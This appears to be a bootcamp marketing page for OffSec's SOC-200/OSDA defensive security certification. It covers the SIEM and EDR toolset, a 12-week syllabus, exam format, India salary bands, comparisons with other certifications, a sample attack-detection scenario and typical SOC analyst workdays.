SOC-200 | Foundational Security Operations and Defensive Analysis

SOC-200 is OffSec’s defensive-side certification, leading to the OSDA credential. The bootcamp toolkit is SOC-analyst-focused: SIEM platforms, EDR workflows, log correlation, threat-hunting playbooks, and attack-detection-engineering. Unlike offensive certs, the focus is on recognising attacker techniques in telemetry rather than executing them.

• Elastic SIEM (ELK Stack). Macksofy lab uses Elastic SIEM as the primary log-analysis platform. Bootcamp covers query language (KQL), dashboard construction, detection-rule authoring, and alerting workflow.
• Splunk Enterprise (concept walkthrough + lab access). Splunk SPL search language, summary indexes, alert configuration. Lab access provided via Splunk dev license for the bootcamp duration.
• Wazuh (open-source SIEM/XDR). Open-source SIEM workflow. Particularly relevant for Indian SMB SOC roles where Splunk/Elastic costs are prohibitive.
• Microsoft Defender for Endpoint + Sentinel. Enterprise EDR + cloud-SIEM. Kusto Query Language (KQL) for hunting. Bootcamp includes attack-simulation exercises against M365 telemetry.
• Sysmon for endpoint visibility. Sysmon configuration deep-dive — process creation, network connections, image loads, registry modifications. Bootcamp covers SwiftOnSecurity baseline plus custom rule authoring.
• YARA + Sigma rule authoring. Detection-engineering toolkit. Bootcamp drills both attack-vector recognition (YARA for malware) and behavioural detection (Sigma rule authoring + cross-SIEM conversion).
• Velociraptor (endpoint hunting + forensics). Open-source EDR / forensics platform. Bootcamp covers VQL (Velociraptor Query Language), artifact collection, and hunt deployment.
• Wireshark + Zeek + Suricata for network telemetry. Packet capture analysis, network-IDS rule authoring, encrypted-traffic flow inspection.
• Threat intelligence platforms — MISP, OpenCTI. Indicator management, threat-actor profiling, IOC sharing across SOC teams.
• Memory forensics — Volatility 3. Memory dump analysis for malware detection and incident response triage.
• Atomic Red Team + Caldera + Stratus Red Team. Adversary-simulation frameworks for testing detection coverage. Bootcamp uses these for detection-rule validation drills.
• MITRE ATT&CK Navigator + D3FEND. Adversary-technique mapping and defensive-countermeasure framework. Bootcamp explicitly maps every detection drill to ATT&CK technique IDs.

The SOC-200 bootcamp lab is a multi-source telemetry environment — Windows + Linux endpoints, Active Directory, M365 cloud activity, network-edge logs — all flowing into Elastic SIEM with Sysmon, Defender EDR, Zeek IDS, and Velociraptor visibility. Macksofy mentors run live adversary-simulation attacks throughout the bootcamp; students hunt the activity in real time across SIEM queries and EDR consoles.

• Weeks 1-2 (SOC fundamentals + log analysis): SIEM query languages (KQL, SPL, EQL), Sysmon event-ID deep-dive, Windows / Linux audit-log analysis, false-positive vs true-positive triage.
• Weeks 3-4 (Initial access detection): Phishing-payload detection workflow, macro / HTA / LNK execution telemetry, AMSI bypass detection, suspicious-process-tree analysis.
• Weeks 5-6 (Persistence + Privilege Escalation detection): Registry/scheduled-task/service persistence indicators, token impersonation alerts, UAC bypass detection, SUID/sudo abuse on Linux.
• Weeks 7-8 (Lateral movement + AD attack detection): Kerberoasting/ASREP detection, NTLM relay indicators, BloodHound activity recognition (collection-time signatures), DCSync / Golden Ticket alerts.
• Weeks 9-10 (C2 + Exfiltration detection): Beacon detection (jitter analysis, callback profile), DNS tunnelling indicators, anomalous-outbound-traffic profiling, data-staging detection.
• Weeks 11-12 (Detection engineering + exam-prep): Sigma rule authoring with cross-SIEM testing, threat-hunting hypothesis development, mock 24-hour exam attempts.

Total hands-on hours: ~280 hours over 12 weeks. Live adversary-simulation drops happen 3-5 times per week (mentor-driven); students learn to hunt within real-time pressure rather than from canned alerts.

The SOC-200 exam (OSDA — Offensive Security Defense Analyst) is a 24-hour hands-on detection-and-response window followed by a 24-hour report-writing window (48 hours total). OffSec provisions an exam environment with multi-source telemetry feeds (SIEM + EDR + endpoint + network); candidates investigate a series of attack scenarios, document the attack chain via observable evidence, and demonstrate detection-engineering capability.

Scoring breakdown: Multiple attack scenarios are presented. For each scenario, candidates must identify the initial-access vector, trace the post-exploitation chain across all telemetry sources, identify all affected hosts/users, and document attacker-controlled IOCs. Scoring is per scenario, with bonus credit for ATT&CK technique-ID accuracy and Sigma rule authoring for the detected attacks. Pass mark is 70/100.

Bootcamp exam-day playbook: Hours 1-3 are baseline triage — review the telemetry sources, understand the environment normality, identify obvious anomalies. Hours 3-12 are deep-dive on scenario 1 with full chain documentation. Hours 12-20 are scenarios 2-3. Hours 20-24 are buffer + screenshot validation. Report due in subsequent 24-hour window.

Retake strategy: Standard OffSec retake terms apply (additional exam fee, 14-day cooldown). Macksofy historical first-attempt pass rate is ~65% with prepared candidates — defensive-side certifications tend to have higher pass rates than offensive equivalents because the scoring rubric rewards thorough documentation rather than novel exploitation.

The OSDA credential is rapidly becoming the gold-standard defensive certification in India SOC hiring — particularly at managed-security-service-providers (MSSPs), GCC SOC teams, and BFSI security operations centres. Of 250 sampled India ‘SOC analyst (L2/L3)’ / ‘threat hunter’ / ‘detection engineer’ JDs in Q1 2026, 38% mention OSDA as preferred (vs ~20% for GIAC GCIH and ~15% for CompTIA CySA+).

Salary bands (India, 2026):

• L1 SOC Analyst + OSDA: ₹6-12 LPA at MSSPs (Paladion / Atos / Wipro), ₹10-18 LPA at GCC SOC teams (Microsoft IDC, Amazon, Google).
• L2/L3 SOC Analyst + OSDA + secondary cert (Splunk SOC Operations / Elastic Engineer): ₹16-28 LPA at lead-analyst / threat-hunter roles.
• Detection Engineer + OSDA + 4+ years: ₹28-45 LPA at SOC engineering / detection-as-code specialist roles, particularly at fintech and SaaS firms scaling SOC capability.
• Incident Response Lead + OSDA + 5+ years: ₹38-65 LPA at IR-lead / SOC-manager roles, particularly at BFSI and consulting firms running 24/7 SOCs.

Average time-to-first-offer post-OSDA: 5-10 weeks for candidates with prior SOC experience. The OSDA holder pool in India is still small (estimated <500 in early 2026) which keeps salary premiums elevated. Macksofy placement cell maintains warm-intro relationships with Paladion, Atos India, Wipro Cyber Defence, Cisco SOC (Bangalore), and 15+ GCC SOC teams.

OSDA vs GIAC GCIH (GIAC Certified Incident Handler): GCIH is the established defensive-side credential — ~USD 979 exam, 4-hour multiple-choice + simulated-environment items. Strong US/EU enterprise recognition. OSDA is newer (2022) and hands-on. Pick GCIH if your manager values established credentialing or US-federal compliance. Pick OSDA for hands-on skill demonstration and growing India recognition.

OSDA vs CompTIA CySA+: CySA+ is foundational ($404, performance-based items). OSDA is professional-tier hands-on. Stack them — CySA+ first as foundational SOC analyst signal, OSDA second for hands-on threat-hunting capability.

OSDA vs Blue Team Level 1 / Blue Team Level 2 (Security Blue Team): BTL1 (~£399) and BTL2 are practical defensive certifications growing in India recognition. BTL1 is foundational; BTL2 is mid-level. OSDA sits between BTL1 and BTL2 in difficulty, with the OffSec brand carrying broader recruiter recognition.

OSDA vs SANS SEC503 (Intrusion Detection In-Depth): SEC503 is the network-focused defensive course leading to GCIA. OSDA is broader — covers SIEM + EDR + endpoint + network, not just network IDS. OSDA is the better fit for modern SOC roles where multi-source telemetry is the norm.

A representative bootcamp detection scenario — mentor runs a live OSEP-style evasive AD attack; students hunt the activity in Elastic SIEM + Defender + Velociraptor:

1. Initial alert triage (15 min): Defender raises a low-severity alert on suspicious Office macro execution. Most SOCs would dismiss as user-error. Bootcamp drills the discipline of full investigation regardless.
2. Process tree analysis (20 min): Sysmon event ID 1 + 7 + 8 events in Elastic. excel.exe spawned mshta.exe with HTTP URL argument. Process tree extends through 4 layers of LOLBin chaining.
3. Network telemetry correlation (15 min): Zeek HTTP log shows the mshta download. Suricata didn’t fire (the URL was on a legitimate CDN). Defender Network Inspection didn’t flag either. The bootcamp covers when network IDS misses LOLBin chains.
4. Implant detection (25 min): Velociraptor hunt for process-injection indicators. Find suspicious thread in procexp64.exe with non-image-backed memory. Memory-dump the thread; Volatility 3 yandex strings reveals Sliver-implant artefacts.
5. AMSI bypass detection (15 min): Search PowerShell Module Logging (event ID 4103) for anomalous AmsiInitFailed flag mutations. Find the bypass execution timestamp.
6. Lateral movement detection (30 min): CrackMapExec password-spray fired 4625 events across the domain. Spotted via Elastic detection rule (5+ failed logons across 10+ hosts in 60 seconds). Then 4624 logon event from compromised service account on new host.
7. BloodHound activity detection (15 min): SharpHound collection generated 4662 events on multiple DC objects. Bootcamp ships a Sigma rule that detects SharpHound collection signatures. Confirm via execution timestamp.
8. Privilege escalation detection (20 min): Shadow Credentials attack via msDS-KeyCredentialLink modification — flagged via 5136 directory-object-modification event. Bootcamp drills the audit-policy configuration that surfaces this attack class.
9. Crown jewel detection (10 min): Defender raises high-severity alert on Mimikatz LSASS access (DLL injection telemetry). Spot the timestamp; correlate with the post-escalation timeline.
10. IR report (90 min): Full attack chain documented with ATT&CK technique IDs (T1566 / T1218.005 / T1059.001 / T1003.001 etc.), affected hosts, attacker-controlled IOCs, recommended detection-rule improvements.

Total time on a familiar attack pattern: ~4 hours. Exam variant adds unknown-attacker-techniques — but the workflow (triage → process-tree → telemetry-correlation → ATT&CK mapping → report) is identical.

SOC-200 is mid-level defensive; foundational SOC experience is the typical prerequisite. Self-assess against this list — seven-of-ten is safe baseline.

• Comfortable in Windows and Linux command lines.
• Understand the OSI layers, TCP/UDP, common ports, and DNS at concept level.
• Have used at least one SIEM platform (Splunk / Elastic / QRadar / Sentinel) in a job or lab context.
• Understand Windows Event Logs at concept level — security log, system log, application log.
• Familiar with the MITRE ATT&CK framework — tactics, techniques, mitigations.
• Have read 2-3 public incident-response writeups (CrowdStrike, Mandiant, SANS InfoSec Reading Room).
• Comfortable reading SQL and basic regex.
• Understand at concept level: privilege escalation, lateral movement, persistence, C2 callback patterns.
• Can dedicate 12-15 study hours per week consistently for 12 weeks.
• Have a workstation with 16GB+ RAM (for local SIEM lab spin-up).

0-2 years SOC L1/L2 field experience is the typical SOC-200 candidate profile. Career-switchers from infrastructure / sysadmin / network-admin roles are admitted with a Macksofy technical interview demonstrating equivalent baseline. Macksofy ships a 4-week ‘SOC Foundations’ bridge for candidates without prior SOC field experience.

The most-asked question from SOC-200 candidates before enrolling: ‘what do I actually do daily after I’m hired into an OSDA-credentialed SOC role?’ The honest answer differs by SOC tier and organisation size. Macksofy bootcamp instructors include practitioners currently working at India MSSP and GCC SOC teams; the cadence below reflects 2025-2026 field reality.

L2 Analyst at an India MSSP (Paladion / Atos / Wipro Cyber Defence model):

• 09:00-09:30: Shift handover from outgoing analyst. Triage queue of overnight alerts: typically 80-150 alerts per shift across 8-15 client SIEMs. Most are L1-triaged false-positives requiring L2 confirmation; 5-10 require active investigation.
• 09:30-13:00: Investigation work on the 5-10 confirmed alerts. Typical workflow: SIEM query for additional context → EDR console for process-tree analysis → memory/disk acquisition if endpoint compromise suspected → IOC enrichment via threat-intel platform → containment recommendation to client incident-response liaison.
• 13:00-14:00: Lunch. SOC analyst burnout is real; senior analysts protect lunch breaks aggressively.
• 14:00-17:00: Client deliverables — weekly threat summaries, detection-coverage reports, post-incident reviews. Plus ongoing SIEM tuning to reduce false-positive volume on the next shift.
• 17:00-18:00: Threat-hunting time-box. Most mature MSSPs allocate 5-10 hours/week to proactive hunting. Use the time for hypothesis-driven hunts: ‘are any of our 12 clients showing IOCs from this week’s published threat actor report?’
• 18:00: Shift handover to outgoing-day-shift analyst. Document open-investigation context for the night-shift analyst.

Detection Engineer at a GCC SOC (Microsoft IDC / Amazon / Google model): Different cadence entirely. ~70% of time on detection-rule authoring and tuning (Sigma → KQL → Sentinel/Defender deployment). ~20% on adversary-simulation purple-team exercises with internal red-team. ~10% on incident-response surge support. The OSDA credential is the standard hiring-floor signal for this role; SANS GIAC senior certs (GCIA / GCFA / GCFE) are typical secondary stacks.

Incident Response Lead at a BFSI SOC: 24/7 on-call rotation (typically 1-week-on, 3-weeks-off). Activity bursts during incidents (24-72 hour high-intensity engagements) with quieter cadence between. Most BFSI IR roles in India require OSDA + GIAC GCIH + a regulatory credential (CISA or CISM) for senior promotion.

What OSDA-holders consistently report as the best parts of the role: Pattern-recognition mastery (you start seeing attack chains across alert noise that L1 analysts miss); cross-organisation visibility (MSSP roles especially); intellectual satisfaction of detection-engineering work. Worst parts: Burnout from alert-volume overload (mitigated by good SOC management); on-call rotation impact on personal life (varies by employer); slow detection-rule deployment velocity at large enterprises with change-management overhead.